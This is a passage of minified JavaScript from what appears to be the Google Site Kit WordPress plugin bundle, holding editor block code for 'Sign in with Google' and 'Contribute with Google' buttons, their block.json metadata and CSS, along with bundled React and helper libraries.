1L04+CG1LFmyhOrVKz6pskcseFaP3759+4rlA7JB/tJo9+GwpKWdVEFChFSuNXg/KEcaSFDaPlvWfm6PWFCmnoi3bdtm8buT9dq0aZMI1+4nyTijbSzRrV67mk7+L5v2Jd2cJBhdjiHEEhTYkFo0b0zR/4imPr1vDmZGVxb56TfwPyjoQMk5N9auZXnvPfiuw1KLfMaWDWll2vILtqJF+LRBdRWpxXIj1e4DZYgcOHAg/frrr2oOkEQw6GBZTBqQCn5k2tkl0sh9AKSzN5DpNzwhwmPDHDNxzPQWLVpUbA9HSz6VefNeYvzqq6/SsmXLpFfYGAgx+5YGSg+QMrUGG9iYveuNvfeBtFASwMAuDSYJ2iVLhJtNLCDLe+65x4JQAwMDac6cOYJEsYRz9epVoRwAKRcKJdJoJRaEQZEBCg3SYP8P2EgFkJUrV6rSCdJA0sOgKJWD0A8xcGvJHfjcd999Isvs7GzR39EvpYESB5Q5pClrPy+JWNA/0E+kgdIHpCy5IgDJDb8l7DFhcojla+3vWD5npP3juh8pZkcMHTh0klLTLCdGRpZjCLH4+91K7SKaU1BQMI0cflPTx8iKyryupC2hK0eX0hm3BvRVftNipIJ0fnX8aHL3SYaQS0nSCspzpkYYlgf69eunbmiifBh0zICAAMrKyrKQNmQcfuQgBmnsDWTYeIXkKTdN5TMYRLRkJcNhVzVigXbRyJEjtRCQfkaqHxyRGKRrbcnG3vvAc/qBGGHY3wG5SK03s4kFZULTTDs4I0waDP5aSVeGw8Z+39ixY9UgaCeBbNCftQZSxcmTJy3yQd+GVpockGX6DRs20KhRo6RX2MAE9ZAb+zISkiI0CbVLkGXt5yURC0gWyh1IpzUgGHd392J1dMZy2SeLPqXU1MMUG3+IMrPOaqtlqNsQYnF3r0nd/9lGgDVj+s1NSkNrqsksIXYqzT54RBNS3NmyfiiN6DCiTOSCfZVt+64Uz1wT4qxlME2RlJCQQFhv1s7WtPFaN36Uq1atslCHRXxJAxkGSa06qTZPa+6qRixnz54V2kUSC5Du1q1bpVfYGRkZFkvDGBgxGFozJb0PvYq0zAPqw5j1wjiDWFDOb7/9JiQz/cQDcdaMtWUqpMPS7ujRo4uRiz4P9F9bG9/65Tn9s/D36NFDSNxS2tGmKUs/L4lYUA40AaHOrpWctOVLN5QXXn/9dVUik+FG21OmTiHs/2z+T4JiFxqdvZqfIcSC3KRm2NgxY6lJQBO1ADMcqxPX0JrEtSVmXRZycYRUUAFnLoNpG3zp0iWxeYof+Z49e4qRDGZtmM2hw4Jc9EY7kCENNHP05uDBg0JVE7NsrQGpYQ0dqpzSaIlF/4OD+K/d78Ezmzdvtliag1ZVp06dZHZ2bQykWoUCnGdo1KiReOb69euEQV4aa8oHelKwpwQh87FmQ0VWzkb1WncyvTYNNpInTJggoyxsR94HpE7UVSsVaIkFEwEMlDDYf8P5Hr3BGSUpJbRr104sv+jTOOJHHSCRff755xb1wbPoe1ATxh/6FiRpWwaDHDTpsGeinyh17txZSDm2SEXmib6H/oDfgtag30MtGpKlfj9Km660/RzlQo1cmg8++IAeeOAB6VVtSGdYuly6dKmqci4j0Ua8E+Bktjl+4jjN/2i+6RphaIdhxNKqZVNq0tiPevXsRd26djMbI3rx3+Mo62KWQ+WMVCSXUEWCcURbLDkjmVYmrKU616Nod1yE3fxdIa3YqhBmtFhCgA48lgPs/ZBs5WErHCQG9UzkiUECB7i0s2P8gLGvA3VJNuYigEEK7/n8+fNiSa1+/fqmHqgrqTUg8jNnzhCkMxxOhfq73Ccp6Vl9PCYraBv6FyYK1pQC9M9o/cAGEgIkKSz7AhtrUor2Ga3bGf0c+yqoI+qFCZCZhyG1bYN7y9YttGHjBjp+Mov2/3FUH22o3zBiaeD/N4psE0yYeY0eNdrQSlrLLCsvm97cPNNhcsG+S3TgP6ilfyj5Km4YEA3yAZnAxKTF0B9/uuEP8epDiUmRdL3o5t4EwqVxlbQiyzfTxkYp1qQhbejPyug1zqydJDezbpw3I2AUAlWpny9YuEBMEOMSDtPpzDNGQWg1H8OIBVe63NOtrbjaZeKEiUIctlqigYGOLomVpcjmPqF0+shAyjljeQCyf7QHPar8VUaDJQmsS2PmB2kEm65QLa1du7ZYdoMWkHZ9XXviuDLiwW2qnAhUpX6OpctZs2eJq1x+3rJH2Ga+VcOIBZVsE96MGjX0cdpyGMr85NdFtP1I8bVkxBllfGr7UUH6WJVcnHUg0qj6/9V8sFaN+8McMdo1fkfScxpGoLwgUJX6uVwGO5WeQwmJ9hWfjHg/hhKLVDv28/OnCeNvXidiREXt5eEMyQXlR3gPpYs57Z1yyt5ee50Rhz0VSCp6tU1t2TgX89JLL5l6t5G2PHYzAkYjUFX6+ey5c5SjCJmmqxnL92MosSBTqR325OAnqVWrVrIc022QS0zaDof3XEpTIWiZ4XxMVTHQ2IHWE7RfoOKMMzLYQwsKChJXmuCWWDaMQEVHoLL3c0wOly5b6hRtMNkXDCeWwNsaUGiLAKcclpSNkDY24T/ZvcgUcjHjqhhZb7YZAUaAETALAXkoMvnACUo7dtqsYizyNZxYsInfTTksiWv0hw0dRqEhN68asSjZRM/2IzG0Zv9aQwimc7PO1FnRJoO6MhtGgBFgBCoSAskpybT4y8XimvwtyqFIfIfFGcZwYkGl5d1hzlI9tgVUWSQYJhRbqHI4I8AIVBQEpIqx2XeD6fEwhVhQSJfoO6i2h7vpNx7rG2TNL8+p/JGZTCmZN+4mwvkVHLDE+RacZ/H19FP+fMQ5F5ZOrKHIYYwAI1CREJA3GedfukLbYvY5teqmEcvfG/lS61aBytkHT6EhZu1aEae2lAtjBBgBRqCKIIBzZtAEy8/Po7370+h/p7Kd2nLTiAWtaKvceFxfufk4MiKSBg4Y6NSGcWGMACPACFRVBFasXEFx8XGUodxgvEe5ydjZxlRi8ax9C0V3bCVO45v9ETBnA8flMQKMACNQHhGQS2DYqI/ZuZ/y8i87vZqmEgtaE6BcTBmuXFAJ44ybj0VB/I8RYAQYgSqIgLzBGE1PVC6aPKFcOOkKYzqxoFHy5mOcyB896lmr17i7ovFcJiPACDAClQUB7KssWPixOGHvjBuM7eHmFGJBBaLahZCPd12XHJy0BwDHMQKMACNQGRCQByFzci/Q7tgb2q+uapfTiAVfmQS51PG8hcJahtGQJ4e4qs1cLiPACDAClQqBJUuXUNIfSeLaFpCKmV+HdAQ4pxELKlO3jge1b9uCblFIhsnFkdfDaRgBRoARsI+AJJXLyqeGf99zgC5cvGT/ASfEOpVY0J569WpTu4jbBbkEBQXT4McH8Z6LE140F8EIMAKVCwHsqSz7ejmlph4mkEps/EHly6L55aKRTicWtBqSS0TrYLEshg39Acq3P5oENCkXgHAlGAFGgBEo7whA+2vlqlVio/5i3mWK33u4XEgqEjeXEAsKx55Lm/AgsaEPP59zAQpsGAFGgBGwj4A8p4JU2KhPSEx1+Z6KvsYuIxZZEamKDD9O6Pfp3YeXxiQ4bDMCjAAj8CcCWPr6cd2P4kQ9glytUmzvxbicWFA5HKIMC7lNnNDH3WL39uxFUVFR9urNcYwAI8AIVBkEIKWs37hB3P2FE/VJKcdcdvjREdDLBbGgorj+JUT5QBjuFoPBlftdu3R1yfdcRAX4HyPACDACLkYA31PZum0r4RPKMLj7K0X5YJcrrmkRFXDwX7khFllf3IrcPKiRuHIfYdAc63RXR6d+5ljWhW1GgBFgBFyBAD4n/N9dO4XGF8rH1feHUk85/Zbi0ra93BGLbAg+FhbYtIH4EiXCoD3WNjKSWt/Rmnx8fGQythkBRoARqBQI5OTk0N59e2lPXJzQ9kKjCgqLKO3oaUpNS69QbSy3xAIU8Znj2wLqiz0YnNiXBstkIS1CKDg4mNWUJShsMwKMQIVDAGrDhw8fVpa3UtTlLjQCKsS4QPLYiQynfU7YSPDKNbFoG+qv7L00auBNDep7C8KRce7u7tS4cQA1atiQ/BWpxtvbm+p5eSlnZDwVlWZ3cnNzk0nZZgQYAUbAqQgUFRUpqsBXFKLIo/PnzlFubi5lZmXSqfR0OnnyhIiTFcKm/OmMXDp1GmnOyuAKaVcYYpHoQorx972VfH29yPtvdcUhSxnHNiPACDACFQkBSCa5Zy5QdvY5ysw+WyGlE2t4Vzhi0TcCBy296nmK0/zQLPPwcBeHL2vVciO3GjUspBv9s+xnBBgBRsBMBCCFFF29SgUFkFwK6ZKyCQ+NLtznde58Xrk72GgUFhWeWIwCgvNhBBgBRoARMAYBJhZjcORcGAFGgBFgBP5EgImFuwIjwAgwAoyAoQgwsRgKJ2fGCDACjAAjwMTCfYARYAQYAUbAUASYWAyFkzNjBBgBRoARYGLhPsAIMAKMACNgKAJMLIbCyZkxAowAI8AIMLFwH2AEGAFGgBEwFAEmFkPh5MwYAUaAEWAEmFi4DzACjAAjwAgYigATi6FwcmaMACPACDACTCzcBxgBRoARYAQMRYCJxVA4OTNGgBFgBBgBJhbuA4wAI8AIMAKGIsDEYiicnBkjwAgwAowAEwv3AUaAEWAEGAFDEWBiMRROzowRYAQYAUaAiYX7ACPACDACjIChCDCxGAonZ8YIMAKMACPAxMJ9gBFgBBgBRsBQBJhYDIWTM2MEGAFGgBFgYuE+wAgwAowAI2AoAkwshsLJmTECjAAjwAj8H8yd9deKaZbhAAAAAElFTkSuQmCC",id:"icon_svg__b",width:406,height:126}))));var h=__webpack_require__(540);const C={label:(0,i.__)("Default (use site settings)","google-site-kit"),value:""};const y=JSON.parse('{"UU":"google-site-kit/sign-in-with-google"}');(0,n.registerBlockType)(y.UU,{edit:function Edit({attributes:e,setAttributes:t,className:n}){const{shape:s,text:c,theme:f,buttonClassName:g}=e,p=(0,r.useBlockProps)({className:n});function y(e){return[C,...e]}function w(e){return function(n){!function(e,n){t({[e]:n||void 0})}(e,n)}}const B={...s?{"data-googlesitekit-siwg-shape":s}:{},...c?{"data-googlesitekit-siwg-text":c}:{},...f?{"data-googlesitekit-siwg-theme":f}:{}},m=["googlesitekit-blocks-sign-in-with-google",g||""].filter(Boolean).join(" ");return(0,h.jsxs)(A.Fragment,{children:[(0,h.jsx)(r.InspectorControls,{children:(0,h.jsxs)(o.PanelBody,{title:(0,i.__)("Button settings","google-site-kit"),initialOpen:!0,children:[(0,h.jsx)(o.SelectControl,{label:(0,i.__)("Button shape","google-site-kit"),value:null!=s?s:"",onChange:w("shape"),options:y(u),__next40pxDefaultSize:!0,__nextHasNoMarginBottom:!0}),(0,h.jsx)(o.SelectControl,{label:(0,i.__)("Button text","google-site-kit"),value:null!=c?c:"",onChange:w("text"),options:y(a),__next40pxDefaultSize:!0,__nextHasNoMarginBottom:!0}),(0,h.jsx)(o.SelectControl,{label:(0,i.__)("Button theme","google-site-kit"),value:null!=f?f:"",onChange:w("theme"),options:y(l),__next40pxDefaultSize:!0,__nextHasNoMarginBottom:!0}),(0,h.jsx)(o.TextControl,{label:(0,i.__)("HTML class","google-site-kit"),help:(0,i.__)("Add optional classes to customize the button in the editor and on the frontend.","google-site-kit"),value:g||"",onChange:function(e){const n=e.trim();t({buttonClassName:n||void 0})},__next40pxDefaultSize:!0,__nextHasNoMarginBottom:!0})]})}),(0,h.jsx)("div",{...p,children:(0,h.jsx)("div",{className:m,style:{maxWidth:"180px",minWidth:"120px"},...B,children:(0,h.jsx)(v,{})})})]})}})})();{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "google-site-kit/sign-in-with-google", "version": "1.170.0", "title": "Sign in with Google", "category": "widgets", "icon": "google", "description": "Allow users to sign in to your site using their Google Account.", "textdomain": "google-site-kit", "attributes": { "shape": { "type": "string", "enum": [ "", "rectangular", "pill" ] }, "text": { "type": "string", "enum": [ "", "continue_with", "signin", "signin_with", "signup_with" ] }, "theme": { "type": "string", "enum": [ "", "outline", "filled_blue", "filled_black" ] }, "buttonClassName": { "type": "string" } } } .googlesitekit-blocks-reader-revenue-manager-button{align-items:center;background-color:#fff;border:1px solid #dadce0;border-radius:4px;color:#1a73e8;display:flex;font-family:"Google Sans",Roboto-Regular,sans-serif,arial;font-size:14px;font-weight:500;justify-content:center;letter-spacing:.014px;outline:0;padding:12px 34px}.googlesitekit-blocks-reader-revenue-manager-button svg{margin-right:8px}.googlesitekit-blocks-reader-revenue-manager-button.googlesitekit-blocks-reader-revenue-manager-button--disabled{filter:grayscale(100%);opacity:.5} (()=>{var e={192:(e,r,t)=>{"use strict";var n=t(696),o=60103;if("function"==typeof Symbol&&Symbol.for){var i=Symbol.for;o=i("react.element"),i("react.fragment")}var u=n.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED.ReactCurrentOwner,c=Object.prototype.hasOwnProperty,l={key:!0,ref:!0,__self:!0,__source:!0};function a(e,r,t){var n,i={},a=null,s=null;for(n in void 0!==t&&(a=""+t),void 0!==r.key&&(a=""+r.key),void 0!==r.ref&&(s=r.ref),r)c.call(r,n)&&!l.hasOwnProperty(n)&&(i[n]=r[n]);if(e&&e.defaultProps)for(n in r=e.defaultProps)void 0===i[n]&&(i[n]=r[n]);return{$$typeof:o,type:e,key:a,ref:s,props:i,_owner:u.current}}r.jsx=a,r.jsxs=a},362:(e,r,t)=>{"use strict";var n=t(441);function o(){}function i(){}i.resetWarningCache=o,e.exports=function(){function e(e,r,t,o,i,u){if(u!==n){var c=new Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw c.name="Invariant Violation",c}}function r(){return e}e.isRequired=e;var t={array:e,bigint:e,bool:e,func:e,number:e,object:e,string:e,symbol:e,any:e,arrayOf:r,element:e,elementType:e,instanceOf:r,node:e,objectOf:r,oneOf:r,oneOfType:r,shape:r,exact:r,checkPropTypes:i,resetWarningCache:o};return t.PropTypes=t,t}},403:(e,r,t)=>{"use strict";var n=t(664),o="function"==typeof Symbol&&Symbol.for,i=o?Symbol.for("react.element"):60103,u=o?Symbol.for("react.portal"):60106,c=o?Symbol.for("react.fragment"):60107,l=o?Symbol.for("react.strict_mode"):60108,a=o?Symbol.for("react.profiler"):60114,s=o?Symbol.for("react.provider"):60109,f=o?Symbol.for("react.context"):60110,p=o?Symbol.for("react.forward_ref"):60112,d=o?Symbol.for("react.suspense"):60113,y=o?Symbol.for("react.memo"):60115,_=o?Symbol.for("react.lazy"):60116,b="function"==typeof Symbol&&Symbol.iterator;function h(e){for(var r="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)r+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+r+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var m={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},v={};function g(e,r,t){this.props=e,this.context=r,this.refs=v,this.updater=t||m}function k(){}function w(e,r,t){this.props=e,this.context=r,this.refs=v,this.updater=t||m}g.prototype.isReactComponent={},g.prototype.setState=function(e,r){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error(h(85));this.updater.enqueueSetState(this,e,r,"setState")},g.prototype.forceUpdate=function(e){this.updater.enqueueForceUpdate(this,e,"forceUpdate")},k.prototype=g.prototype;var S=w.prototype=new k;S.constructor=w,n(S,g.prototype),S.isPureReactComponent=!0;var O={current:null},j=Object.prototype.hasOwnProperty,E={key:!0,ref:!0,__self:!0,__source:!0};function x(e,r,t){var n,o={},u=null,c=null;if(null!=r)for(n in void 0!==r.ref&&(c=r.ref),void 0!==r.key&&(u=""+r.key),r)j.call(r,n)&&!E.hasOwnProperty(n)&&(o[n]=r[n]);var l=arguments.length-2;if(1===l)o.children=t;else if(1<l){for(var a=Array(l),s=0;s<l;s++)a[s]=arguments[s+2];o.children=a}if(e&&e.defaultProps)for(n in l=e.defaultProps)void 0===o[n]&&(o[n]=l[n]);return{$$typeof:i,type:e,key:u,ref:c,props:o,_owner:O.current}}function R(e){return"object"==typeof e&&null!==e&&e.$$typeof===i}var P=/\/+/g,C=[];function q(e,r,t,n){if(C.length){var o=C.pop();return o.result=e,o.keyPrefix=r,o.func=t,o.context=n,o.count=0,o}return{result:e,keyPrefix:r,func:t,context:n,count:0}}function $(e){e.result=null,e.keyPrefix=null,e.func=null,e.context=null,e.count=0,10>C.length&&C.push(e)}function A(e,r,t,n){var o=typeof e;"undefined"!==o&&"boolean"!==o||(e=null);var c=!1;if(null===e)c=!0;else switch(o){case"string":case"number":c=!0;break;case"object":switch(e.$$typeof){case i:case u:c=!0}}if(c)return t(n,e,""===r?"."+I(e,0):r),1;if(c=0,r=""===r?".":r+":",Array.isArray(e))for(var l=0;l<e.length;l++){var a=r+I(o=e[l],l);c+=A(o,a,t,n)}else if(null===e||"object"!=typeof e?a=null:a="function"==typeof(a=b&&e[b]||e["@@iterator"])?a:null,"function"==typeof a)for(e=a.call(e),l=0;!(o=e.next()).done;)c+=A(o=o.value,a=r+I(o,l++),t,n);else if("object"===o)throw t=""+e,Error(h(31,"[object Object]"===t?"object with keys {"+Object.keys(e).join(", ")+"}":t,""));return c}function T(e,r,t){return null==e?0:A(e,"",r,t)}function I(e,r){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var r={"=":"=0",":":"=2"};return"$"+(""+e).replace(/[=:]/g,function(e){return r[e]})}(e.key):r.toString(36)}function N(e,r){e.func.call(e.context,r,e.count++)}function U(e,r,t){var n=e.result,o=e.keyPrefix;e=e.func.call(e.context,r,e.count++),Array.isArray(e)?B(e,n,t,function(e){return e}):null!=e&&(R(e)&&(e=function(e,r){return{$$typeof:i,type:e.type,key:r,ref:e.ref,props:e.props,_owner:e._owner}}(e,o+(!e.key||r&&r.key===e.key?"":(""+e.key).replace(P,"$&/")+"/")+t)),n.push(e))}function B(e,r,t,n,o){var i="";null!=t&&(i=(""+t).replace(P,"$&/")+"/"),T(e,U,r=q(r,i,n,o)),$(r)}var F={current:null};function L(){var e=F.current;if(null===e)throw Error(h(321));return e}var D={ReactCurrentDispatcher:F,ReactCurrentBatchConfig:{suspense:null},ReactCurrentOwner:O,IsSomeRendererActing:{current:!1},assign:n};r.Children={map:function(e,r,t){if(null==e)return e;var n=[];return B(e,n,null,r,t),n},forEach:function(e,r,t){if(null==e)return e;T(e,N,r=q(null,null,r,t)),$(r)},count:function(e){return T(e,function(){return null},null)},toArray:function(e){var r=[];return B(e,r,null,function(e){return e}),r},only:function(e){if(!R(e))throw Error(h(143));return e}},r.Component=g,r.Fragment=c,r.Profiler=a,r.PureComponent=w,r.StrictMode=l,r.Suspense=d,r.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=D,r.cloneElement=function(e,r,t){if(null==e)throw Error(h(267,e));var o=n({},e.props),u=e.key,c=e.ref,l=e._owner;if(null!=r){if(void 0!==r.ref&&(c=r.ref,l=O.current),void 0!==r.key&&(u=""+r.key),e.type&&e.type.defaultProps)var a=e.type.defaultProps;for(s in r)j.call(r,s)&&!E.hasOwnProperty(s)&&(o[s]=void 0===r[s]&&void 0!==a?a[s]:r[s])}var s=arguments.length-2;if(1===s)o.children=t;else if(1<s){a=Array(s);for(var f=0;f<s;f++)a[f]=arguments[f+2];o.children=a}return{$$typeof:i,type:e.type,key:u,ref:c,props:o,_owner:l}},r.createContext=function(e,r){return void 0===r&&(r=null),(e={$$typeof:f,_calculateChangedBits:r,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:s,_context:e},e.Consumer=e},r.createElement=x,r.createFactory=function(e){var r=x.bind(null,e);return r.type=e,r},r.createRef=function(){return{current:null}},r.forwardRef=function(e){return{$$typeof:p,render:e}},r.isValidElement=R,r.lazy=function(e){return{$$typeof:_,_ctor:e,_status:-1,_result:null}},r.memo=function(e,r){return{$$typeof:y,type:e,compare:void 0===r?null:r}},r.useCallback=function(e,r){return L().useCallback(e,r)},r.useContext=function(e,r){return L().useContext(e,r)},r.useDebugValue=function(){},r.useEffect=function(e,r){return L().useEffect(e,r)},r.useImperativeHandle=function(e,r,t){return L().useImperativeHandle(e,r,t)},r.useLayoutEffect=function(e,r){return L().useLayoutEffect(e,r)},r.useMemo=function(e,r){return L().useMemo(e,r)},r.useReducer=function(e,r,t){return L().useReducer(e,r,t)},r.useRef=function(e){return L().useRef(e)},r.useState=function(e){return L().useState(e)},r.version="16.14.0"},441:e=>{"use strict";e.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},452:e=>{!function(){"use strict";var r={}.hasOwnProperty;function t(){for(var e="",r=0;r<arguments.length;r++){var t=arguments[r];t&&(e=o(e,n(t)))}return e}function n(e){if("string"==typeof e||"number"==typeof e)return e;if("object"!=typeof e)return"";if(Array.isArray(e))return t.apply(null,e);if(e.toString!==Object.prototype.toString&&!e.toString.toString().includes("[native code]"))return e.toString();var n="";for(var i in e)r.call(e,i)&&e[i]&&(n=o(n,i));return n}function o(e,r){return r?e?e+" "+r:e+r:e}e.exports?(t.default=t,e.exports=t):"function"==typeof define&&"object"==typeof define.amd&&define.amd?define("classnames",[],function(){return t}):window.classNames=t}()},540:(e,r,t)=>{"use strict";e.exports=t(192)},664:e=>{"use strict";var r=Object.getOwnPropertySymbols,t=Object.prototype.hasOwnProperty,n=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var r={},t=0;t<10;t++)r["_"+String.fromCharCode(t)]=t;if("0123456789"!==Object.getOwnPropertyNames(r).map(function(e){return r[e]}).join(""))return!1;var n={};return"abcdefghijklmnopqrst".split("").forEach(function(e){n[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},n)).join("")}catch(e){return!1}}()?Object.assign:function(e,o){for(var i,u,c=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}(e),l=1;l<arguments.length;l++){for(var a in i=Object(arguments[l]))t.call(i,a)&&(c[a]=i[a]);if(r){u=r(i);for(var s=0;s<u.length;s++)n.call(i,u[s])&&(c[u[s]]=i[u[s]])}}return c}},688:(e,r,t)=>{e.exports=t(362)()},696:(e,r,t)=>{"use strict";e.exports=t(403)}},r={};function __webpack_require__(t){var n=r[t];if(void 0!==n)return n.exports;var o=r[t]={exports:{}};return e[t](o,o.exports,__webpack_require__),o.exports}__webpack_require__.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return __webpack_require__.d(r,{a:r}),r},__webpack_require__.d=(e,r)=>{for(var t in r)__webpack_require__.o(r,t)&&!__webpack_require__.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:r[t]})},__webpack_require__.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),(()=>{"use strict";const e=wp.blocks,r=wp.blockEditor,t=wp.components,n=wp.element,o=wp.data,i=googlesitekit.i18n;var u,c=__webpack_require__(452),l=__webpack_require__.n(c),a=__webpack_require__(688),s=__webpack_require__.n(a),f=__webpack_require__(696);function p(){return p=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)({}).hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e},p.apply(null,arguments)}const d=e=>f.createElement("svg",p({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 43 44"},e),u||(u=f.createElement("g",{fill:"none",fillRule:"evenodd"},f.createElement("path",{fill:"#FBBC05",d:"m2.253 12.252 7.399 5.658A13 13 0 0 0 9 22c0 1.43.229 2.805.652 4.09l-7.4 5.658A22 22 0 0 1 0 22c0-3.506.81-6.814 2.253-9.748"}),f.createElement("path",{fill:"#EA4335",d:"m9.652 17.91-7.4-5.658A21.94 21.94 0 0 1 22 0c5.6 0 10.6 2.1 14.5 5.5l-6.4 6.4C27.9 10.1 25.1 9 22 9c-5.77 0-10.64 3.725-12.348 8.91"}),f.createElement("path",{fill:"#34A853",d:"m2.25 31.742 7.396-5.67A12.975 12.975 0 0 0 22 35c6.1 0 10.7-3.1 11.8-8.5H22V18h20.5c.3 1.3.5 2.7.5 4 0 14-10 22-21 22A21.94 21.94 0 0 1 2.25 31.742"}),f.createElement("path",{fill:"#4285F4",d:"m36.34 38.52-7.025-5.437c2.297-1.45 3.895-3.685 4.485-6.583H22V18h20.5c.3 1.3.5 2.7.5 4 0 7.17-2.623 12.767-6.66 16.52"}))));var y=__webpack_require__(540);function EditorButton({children:e,disabled:r}){return(0,y.jsxs)("button",{disabled:r,className:l()("googlesitekit-blocks-reader-revenue-manager-button",{"googlesitekit-blocks-reader-revenue-manager-button--disabled":r}),children:[(0,y.jsx)(d,{height:"18",width:"18"}),e]})}EditorButton.propTypes={children:s().node.isRequired,disabled:s().bool.isRequired};googlesitekit.data,(0,i.__)("Specific content types","google-site-kit"),(0,i.__)("Specified pages","google-site-kit"),(0,i.__)("Site wide","google-site-kit");s().string.isRequired,s().string.isRequired,s().node.isRequired,s().node.isRequired,s().node.isRequired,s().node.isRequired;const _=JSON.parse('{"UU":"google-site-kit/rrm-contribute-with-google"}');function Edit(){const e=(0,r.useBlockProps)();return(0,y.jsxs)(n.Fragment,{children:[(0,y.jsx)(r.InspectorControls,{children:(0,y.jsx)("div",{className:"block-editor-block-card",children:(0,y.jsx)(t.Notice,{status:"warning",isDismissible:!1,children:(0,i.__)("This block can only be configured by Site Kit users. Please contact your administrator.","google-site-kit")})})}),(0,y.jsx)("div",{...e,children:(0,y.jsx)("div",{className:"googlesitekit-blocks-reader-revenue-manager",children:(0,y.jsx)(EditorButton,{disabled:!0,children:/* translators: Button label for Contribute with Google. See: https://github.com/subscriptions-project/swg-js/blob/05af2d45cfcaf831a6b4d35c28f2c7b5c2e39308/src/i18n/swg-strings.ts#L58-L91 (please refer to the latest version of the file) */ /* translators: Button label for Contribute with Google. See: https://github.com/subscriptions-project/swg-js/blob/05af2d45cfcaf831a6b4d35c28f2c7b5c2e39308/src/i18n/swg-strings.ts#L58-L91 (please refer to the latest version of the file) */ (0,i.__)("Contribute with Google","google-site-kit")})})})]})}!function(){const r=!!(0,o.select)("core/edit-site");(0,e.registerBlockType)(_.UU,{edit:()=>r?null:(0,y.jsx)(Edit,{}),supports:{inserter:!r}})}()})()})();{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 2, "name": "google-site-kit/rrm-contribute-with-google", "version": "1.170.0", "title": "Contribute with Google", "category": "widgets", "icon": "google", "description": "Allow users to make voluntary contributions using Reader Revenue Manager.", "textdomain": "google-site-kit", "supports": { "inserter": true } } (()=>{var e={192:(e,t,r)=>{"use strict";var n=r(696),o=60103;if("function"==typeof Symbol&&Symbol.for){var i=Symbol.for;o=i("react.element"),i("react.fragment")}var c=n.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED.ReactCurrentOwner,u=Object.prototype.hasOwnProperty,s={key:!0,ref:!0,__self:!0,__source:!0};function a(e,t,r){var n,i={},a=null,l=null;for(n in void 0!==r&&(a=""+r),void 0!==t.key&&(a=""+t.key),void 0!==t.ref&&(l=t.ref),t)u.call(t,n)&&!s.hasOwnProperty(n)&&(i[n]=t[n]);if(e&&e.defaultProps)for(n in t=e.defaultProps)void 0===i[n]&&(i[n]=t[n]);return{$$typeof:o,type:e,key:a,ref:l,props:i,_owner:c.current}}t.jsx=a,t.jsxs=a},362:(e,t,r)=>{"use strict";var n=r(441);function o(){}function i(){}i.resetWarningCache=o,e.exports=function(){function e(e,t,r,o,i,c){if(c!==n){var u=new Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw u.name="Invariant Violation",u}}function t(){return e}e.isRequired=e;var r={array:e,bigint:e,bool:e,func:e,number:e,object:e,string:e,symbol:e,any:e,arrayOf:t,element:e,elementType:e,instanceOf:t,node:e,objectOf:t,oneOf:t,oneOfType:t,shape:t,exact:t,checkPropTypes:i,resetWarningCache:o};return r.PropTypes=r,r}},403:(e,t,r)=>{"use strict";var n=r(664),o="function"==typeof Symbol&&Symbol.for,i=o?Symbol.for("react.element"):60103,c=o?Symbol.for("react.portal"):60106,u=o?Symbol.for("react.fragment"):60107,s=o?Symbol.for("react.strict_mode"):60108,a=o?Symbol.for("react.profiler"):60114,l=o?Symbol.for("react.provider"):60109,p=o?Symbol.for("react.context"):60110,f=o?Symbol.for("react.forward_ref"):60112,d=o?Symbol.for("react.suspense"):60113,y=o?Symbol.for("react.memo"):60115,_=o?Symbol.for("react.lazy"):60116,h="function"==typeof Symbol&&Symbol.iterator;function b(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,r=1;r<arguments.length;r++)t+="&args[]="+encodeURIComponent(arguments[r]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var m={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},g={};function v(e,t,r){this.props=e,this.context=t,this.refs=g,this.updater=r||m}function k(){}function w(e,t,r){this.props=e,this.context=t,this.refs=g,this.updater=r||m}v.prototype.isReactComponent={},v.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error(b(85));this.updater.enqueueSetState(this,e,t,"setState")},v.prototype.forceUpdate=function(e){this.updater.enqueueForceUpdate(this,e,"forceUpdate")},k.prototype=v.prototype;var S=w.prototype=new k;S.constructor=w,n(S,v.prototype),S.isPureReactComponent=!0;var O={current:null},P=Object.prototype.hasOwnProperty,E={key:!0,ref:!0,__self:!0,__source:!0};function j(e,t,r){var n,o={},c=null,u=null;if(null!=t)for(n in void 0!==t.ref&&(u=t.ref),void 0!==t.key&&(c=""+t.key),t)P.call(t,n)&&!E.hasOwnProperty(n)&&(o[n]=t[n]);var s=arguments.length-2;if(1===s)o.children=r;else if(1<s){for(var 